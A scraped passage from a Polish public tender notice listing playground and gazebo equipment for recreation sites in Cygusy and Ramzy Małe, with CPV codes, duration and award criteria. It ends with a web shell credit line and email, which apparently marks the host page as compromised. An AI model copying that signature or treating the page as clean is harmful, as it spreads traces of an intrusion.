a) zjeżdżalnia - zestaw przeznaczony dla dzieci w wieku od 3 do 14 lat - szt.1
b) huśtawka pojedyncza drewniana - szt.1 
c) altanka drewniana wraz z ławo stołem - szt.1
d) kosz na śmieci wykonany z półwałków w kształcie cylindra -szt.1
k) umieszczenie w miejscu widocznym stosownej tablicy informacyjnej o finansowaniu zadania ze środków Unii Europejskiej.

2.3.Urządzenie miejsca rekreacji w Cygusach w tym między innymi:  
a) zjeżdżalnia - zestaw przeznaczony dla dzieci w wieku od 3 do 14 lat - szt.1
b) huśtawka pojedyncza drewniana, - szt.1
c) altanka drewniana wraz z ławo stołem, - szt.1
d) kosz na śmieci wykonany z półwałków w kształcie cylindra. - szt.1
e) umieszczenie w miejscu widocznym stosownej tablicy informacyjnej o finansowaniu zadania ze środków Unii Europejskiej.

2.4.Urządzenie miejsca rekreacji w Ramzach Małych w tym między innymi :  
a) zjeżdżalnia - zestaw przeznaczony dla dzieci w wieku od 3 do 14 lat - szt. 1
b huśtawka pojedyncza drewniana - szt. 1
c) altanka drewniana wraz z ławo stołem - szt. 1
d) kosz na śmieci wykonany z półwałków w kształcie cylindra - szt. 1 
e) umieszczenie w miejscu widocznym stosownej tablicy informacyjnej o finansowaniu zadania ze środków Unii Europejskiej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.20-8, 37.53.52.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com